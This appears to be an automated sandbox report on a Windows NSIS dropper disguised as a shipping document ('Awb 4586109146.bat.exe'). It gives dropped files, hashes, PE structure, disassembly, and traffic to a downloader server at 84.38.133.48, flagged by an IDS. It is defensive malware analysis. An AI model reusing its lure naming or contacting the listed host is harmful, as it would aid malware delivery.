Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse
	B7zKt98iey.exe	Get hash	malicious	Unknown	Browse
	B7zKt98iey.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse
	http://mirror.cdex.mu/CDex-2.24.exe	Get hash	malicious	Unknown	Browse
	http://mirror.cdex.mu/CDex-2.24.exe	Get hash	malicious	Unknown	Browse
	ROM_Files_939964.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse
	AyqwnIUrcz.exe	Get hash	malicious	Unknown	Browse
	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse
	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse
	installer.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.818015063694808
Encrypted:	false
SSDEEP:	48:S46+/zTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mxofjLl:z5uPbOBtWZBV8jAWiAJCdv2CmAL
MD5:	AB1DB56369412FE8476FEFFFD11E4CC0
SHA1:	DAAD036A83B2EE2FA86D840A34A341100552E723
SHA-256:	6F14C8F01F50A30743DAC68C5AC813451463DFB427EB4E35FCDFE2410E1A913B
SHA-512:	8D886643B4FC24ADF78F76B663227D6E61863F89E0CBD49548F40DD040666CA94EA46BEC9E336850E4F300995D56E6DC85B689C8E09FF46758822D280F06B03D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: kJs0JTLO6I.exe, Detection: malicious, Browse Filename: kJs0JTLO6I.exe, Detection: malicious, Browse Filename: B7zKt98iey.exe, Detection: malicious, Browse Filename: B7zKt98iey.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: ROM_Files_939964.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....~.\...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nscEFD5.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: YF3YnL4ksc.exe, Detection: malicious, Browse Filename: YF3YnL4ksc.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse Filename: AyqwnIUrcz.exe, Detection: malicious, Browse Filename: Uniswap Sniper Bot With GUI.exe, Detection: malicious, Browse Filename: Uniswap Sniper Bot With GUI.exe, Detection: malicious, Browse Filename: naukri-launcher 10.exe, Detection: malicious, Browse Filename: naukri-launcher 10.exe, Detection: malicious, Browse Filename: installer.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\sillinesses\Anglomans.ala

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1850292
Entropy (8bit):	0.15787706683171052
Encrypted:	false
SSDEEP:	768:OoaZJLqGy5Qo+RU46dPn7e4O7QkhE/EtrgCN85RaQ7EMB+6r26REcybaHpJkCCXx:yHV
MD5:	F1B19352186CB57567C88C002F5AF9BD
SHA1:	96BB06DBF3E930E8174E22C552E788BF62F8792E
SHA-256:	9B172DB9C04C16B1C75AA5EEDFA5500FB4650BC59282BBCB5BB2D983C4B00406
SHA-512:	AF16686666C2B9CB40C67D79DDA844550ECEA72CD2537F1CEAC0A944799409B5C157ACDA2700327998EAC3FD07A94CB6FA0A3708C24E24403844C092AA1A7AA2
Malicious:	false
Reputation:	low
Preview:	...............................................................................................................................................................`.....................................................................................................................................................................................................................................................................................................................!...........................................................................................................................................................................................................................................................................................m...............................................................................Y......................................................................................................................................................................

C:\Users\user\AppData\Local\sillinesses\Befoulment209.non

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1264154
Entropy (8bit):	0.15737251343733819
Encrypted:	false
SSDEEP:	768:Kz/OAFYCddplBJdxt7g7a6CgpChVGVUOgCwE6o5p5/wrS1jY:YTS
MD5:	5F2597B55457B6EA842E218E8D3B098D
SHA1:	0795BC493C7B065EF549AA73C4FE9E3384566E7A
SHA-256:	6E30C08BC1D4AD6E942130B8F9EFA770DC1812938298114ACC187DD436DB6006
SHA-512:	1DBE04D8CDD6E4881EFB1FA0619728E983EC3E14445D8A9E70796DFB55DA950C255CA30856F6D8B3BF79EC71B9284C07ECD7CD1662E5C9ED2C51B947C4A79FA0
Malicious:	false
Reputation:	low
Preview:	...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\sillinesses\Generalists.Bor

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	275739
Entropy (8bit):	7.616966107008561
Encrypted:	false
SSDEEP:	6144:bQtPgXRjxGphacIiNMK4jChJ5NV4SW9qAFEOM9D:4gNxGpRbMKyChJ5Ncq9z9D
MD5:	8D798E6993F3500FE5366F149F86ED14
SHA1:	28F0294D9A37F1F1BB4B0882A89842239493A441
SHA-256:	FB29B102FE2AB99935BB1671A8962DE3CEC97B2F88A438F7CDF23D24C6CA8BD9
SHA-512:	928DA5C68A8EA94C0944B32A922D870DC92A62DB24B5B083EE991EF00542BB450A0B52EC89BEC9512564C851C7CE49C6DCEDF7C6EBF933E7B7BA1C5868E2DE2D
Malicious:	false
Reputation:	low
Preview:	..................>.............L.....................B........................."......ZZZZZ...CCCC...........n....gg...).............................................d..\...F.....SS..U..u............J...........<..........0....66.........\|......zzzzz....##.......3..OOOO..........**.................ppp...................SS..........YY...n......0.OOO.........L..7.........d.....Y......f..........................w..R........PP...........HHHH.................sss. ...`.C.%...QQ.w..............))))...........!......222222...dd.........WWWW.....n..........w............9..............z..J...]..44...>......QQQ.............**.... ................<.........~~~............]]]......MM.\................=.........77777..........kkk............m......................l...........c...............##.........??....0..........(...?...............................88....................www.....=.---.....x........zz.............VVV.......--.......>>..........^^....n...........FFFF...AAA...............P.....

C:\Users\user\AppData\Local\sillinesses\Strutskrter.eri

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1785286
Entropy (8bit):	0.157818699705013
Encrypted:	false
SSDEEP:	768:igjhkFxRk4Cg3EFcNweXS+wUya8d0Dclmrwtx9Rh0hruNz5S2L8HeM+MQ4Ee4EsK:gT
MD5:	E75D60F1347F2887587045D4F6673154
SHA1:	56930A609A1C67A591A557F7610ACFFCD89AB025
SHA-256:	CEDE7492DB5C81B0B046258187557EE9B2C6E791021631FF635409395ED6054A
SHA-512:	76060B17EB25286EE47558B72A5C034EF2D0D5EDBE8205F57628740900CB39F81953EC5A5C917CE84FD7ED5FDA6F03AC9C819B598D58B9D2AF12CFB3F5385830
Malicious:	false
Reputation:	low
Preview:	...........................................................................................g......................................................................................................................U......................................................................................................................................................................................................................................................................................................................2..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\sillinesses\allowanced.bri

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	3072070
Entropy (8bit):	0.1574149435101028
Encrypted:	false
SSDEEP:	768:GYkPCXTz5BZxw9NxlQnAyZSMNwxpqOKNcB5YdPpxk7r6s5WQxNUUlkwrvUcM0gg6:Ln/
MD5:	1A32E4C0027DC7FF10A50CA03C8A1DF9
SHA1:	D4C66E381A195EF0E71110645E35C02FA642614D
SHA-256:	323EDBC20508A0DB8FDB408E29A45ED0606E5366791CDA820E0ECD4C1A62B37E
SHA-512:	94D2B7A01C557AE2C079785DC8756BDFA5F4EDD4AADFA389D1D8877F94BC122B58AC13731B286FF262C7CA68FEEA5552E99AB5FCB414493FE3C1CB739F89B1BE
Malicious:	false
Preview:	......................................................................................................................................................................................L...............................................................................................................................................n..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..............................................................................................................................^...................................................................

C:\Users\user\AppData\Local\sillinesses\atomvaabenlagre.Pal

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	102004
Entropy (8bit):	2.6510670372501517
Encrypted:	false
SSDEEP:	1536:NPyE3NTABntarYogFdEEMkG3z8l6mC2fSwdkG:8lFBtH
MD5:	D0D2FB35DEC28F06F827DF22AC20E262
SHA1:	E48B1A07732C174C82885858FD5C2C91E280E086
SHA-256:	431C1A39FA636F7AC51D9428D33D2EDE8110A599357EE13AD94DAF00A5C8343F
SHA-512:	8D8B951E2A1303F1DDCDA36C2D563AADF95B27ABD1291EE60EE2E97513DBAB160F213B3A66CB087E078725AEAA3C0F558F9C57BBC8A71AC120E57FCF680978B7
Malicious:	false
Preview:	000000D400E700A0000000000000000000C1C1C1005C5C5C5C5C5C002C2C2C00004B004141414100919100000000000000D0D00048480000DE000024009B9B000000002121212121000000000000004C000000003A3A00009500007F7F00007900000091910000FA00005F0000360026262626262626008E00EEEE006464000000ECECECECECECEC000000000000CF00A2006565000C002727270000009D9D0000000000A800EF003E0038000000FCFC0000000044004A00ABAB006E00515100009A9A00AB002A00004900ECEC000014000000DB000000FB0000777777777777777700ABABABABABAB002500000000005A5A000055550000CDCD008D008989000025000000000000800076000000006000000000000000FDFD0000003232000000009F9F000000910007070700A500D0000000BF0000000000F2F200000000001515006D00BBBB0000000000B8B8B8000071710000C600005959000000F6F600008B000000000000005E00D50067000011111100009000C000BA001A1A1A000000650000B5B5003D3D3D0000000000004E4E003100000000D2000000B3000028282828004D4D4D4D00FA00000000000606060606008A8A00E7E7E700000000009400F20000DA00E5E500F6000000000000DF000013000007070700191900000027007171004242008484000000F6006E6E000000

C:\Users\user\AppData\Local\sillinesses\kartoteksstyring.gla

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	6157882
Entropy (8bit):	0.15896061425174612
Encrypted:	false
SSDEEP:	768:g7/K3a5vYm6xqf8FLfJI80SEtK8ccB6X76bD8kNTM5N1LshHe0X9Jk4BzFIpyTVI:w5wodUqLAH6
MD5:	45CD3902AC3254547F0E44C9A016B31B
SHA1:	4B9F8CDFD0A8FADE68C4C8EF6D6A1726A601A750
SHA-256:	FF0227B020CC3CC727C369F4E938722DC16E797EB2669C764DE823FC46992664
SHA-512:	8935B6547F93FAB6F5E4CA6A258B96AECD86E2785F8DACBAD1CB6C1A641289535A6593D5E0196A56E4E4E662B20279D369F3CA39D1571147A2A92EDD8C1E9DE3
Malicious:	false
Preview:	...................................................................................................t...............................................................................................................................................................................................................................................................................................................................................................KJ...................................................................Q...........................................................................................................................................z............................................Q..................................................................................................................................................\..........................................................q........................................................................................

C:\Users\user\AppData\Local\sillinesses\tubig.txt

Download File

Process:	C:\Users\user\Desktop\Awb 4586109146.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	345
Entropy (8bit):	4.294234517489459
Encrypted:	false
SSDEEP:	6:KGljJoxWTCrK0XuLmqarK5pCAyQvLoZ2kMXATrQvkt+fC3ba2AF/PXkSLAJRn:dlj+WTzJm1rKnCAyQvk2kWATrT5a2nNL
MD5:	231F388B44C110D6FDD16605BBE17E52
SHA1:	D2BEE1AAE2A003FD72A46FFDEDE1B5AB0BF89D86
SHA-256:	325DC82DFE4B64A6FE20E3824BBFE752C0156A6E4239A45AEA7BBC4F1751560D
SHA-512:	5AE947D4694D5824D4BB9F64FC5F747660C7C6993CD1B4D86D41587FD0A92BB65657C0F4855010F2E6F4BF7F1689BB2C95EC32D29FC78D2664F52ABB5ACE9081
Malicious:	false
Preview:	inchoant gowdnie medejernes inswarming salt svenaage aleksandrines forehearth..frdselslovs reformations flnseknivene.accentuationernes sudansk farfdrene nathold cryptological beskftige svrenes.naturata junket hjemfalde torskens.revelled puffed buffistens.muscularizes wankel autorhythmic liturgierne tuilles totalitarianisms asaron temperately..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.950880274807356
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Awb 4586109146.bat.exe
File size:	795'558 bytes
MD5:	a3bb238f798a512f7465f804735b8f9a
SHA1:	31c7c96a95c22e7f4ab58b0f5330c4c79172be79
SHA256:	9775ae8b4fa626011fb022ede69e2ec2bec2b7868bb70bda276da0145b4b410f
SHA512:	4038f9e8b93e6e4dfa4f4b7493bb2e5988ee29a2d91029fa136549f424140cf0a77426d8739d40e95c5ac943681b384bdeb966d84bce0693c24d578220c1365e
SSDEEP:	24576:4dEqcVwnUAFPtUBCSoR94Ou2sgnqVNO7qg+E5cnj:HqcVwnhFPtU7oR3uIn6NAqDE5cnj
TLSH:	44052303B24D1253EEF1813497328BF89B792D50B9B0AB03B7ED3F087D76785A91A951
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........

File Icon


Icon Hash:	ec92131fb7aba8f4

Static PE Info

General

Entrypoint:	0x40338f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007FA3A4CABEC3h
push ebx
call 00007FA3A4CAF175h
cmp eax, ebx
je 00007FA3A4CABEB9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FA3A4CAF0EFh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FA3A4CABE9Ch
push 0000000Ah
call 00007FA3A4CAF148h
push 00000008h
call 00007FA3A4CAF141h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007FA3A4CAF135h
cmp eax, ebx
je 00007FA3A4CABEC1h
push 0000001Eh
call eax
test eax, eax
je 00007FA3A4CABEB9h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8610	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x73000	0x7620	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6627	0x6800	37029c3103747b9cc70c8ecd944a9b83	False	0.6643629807692307	data	6.451784672975888	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x14a2	0x1600	eecac1fed9cc6b447d50940d178404d8	False	0.4405184659090909	data	5.025178929113415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	939516377e7577b622eb1ffdc4b5db4a	False	0.517578125	data	4.03532418489749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x3e000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x73000	0x7620	0x7800	fa3a7dc11d759e32654dca4a134433ea	False	0.511328125	data	5.487917299032731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x73388	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4786307053941909
RT_ICON	0x75930	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5318949343339587
RT_ICON	0x769d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	English	United States	0.5804904051172708
RT_ICON	0x77880	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5766393442622951
RT_ICON	0x78208	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.7026173285198556
RT_ICON	0x78ab0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 672	English	United States	0.8035714285714286
RT_ICON	0x79178	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States	0.6286127167630058
RT_ICON	0x796e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6037234042553191
RT_DIALOG	0x79b48	0xb8	data	English	United States	0.6467391304347826
RT_DIALOG	0x79c00	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x79d48	0x100	data	English	United States	0.5234375
RT_DIALOG	0x79e48	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x79f68	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x79fc8	0x76	data	English	United States	0.6440677966101694
RT_VERSION	0x7a040	0x34c	data	English	United States	0.4703791469194313
RT_MANIFEST	0x7a390	0x290	XML 1.0 document, ASCII text, with very long lines (656), with no line terminators	English	United States	0.5640243902439024

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-18T11:08:09.579335+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.8	49711	84.38.133.48	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:08:08.212618113 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:08.332236052 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:08.332341909 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:08.332715988 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:08.453609943 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579253912 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579334974 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.579350948 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579385996 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579422951 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579428911 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.579469919 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.579469919 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.579479933 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579515934 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.579514980 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.579561949 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.655630112 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.655673981 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.655694962 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.655695915 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.655726910 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.655726910 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.655771971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.655807972 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.699529886 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.699716091 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.699713945 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.699779987 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.703449965 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.703528881 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.770303965 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.770451069 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.770490885 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.770522118 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.774529934 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.774652958 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.774658918 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.774727106 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.782856941 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.783051968 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.783060074 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.783189058 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.791225910 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.791331053 CET	49711	80	192.168.2.8	84.38.133.48
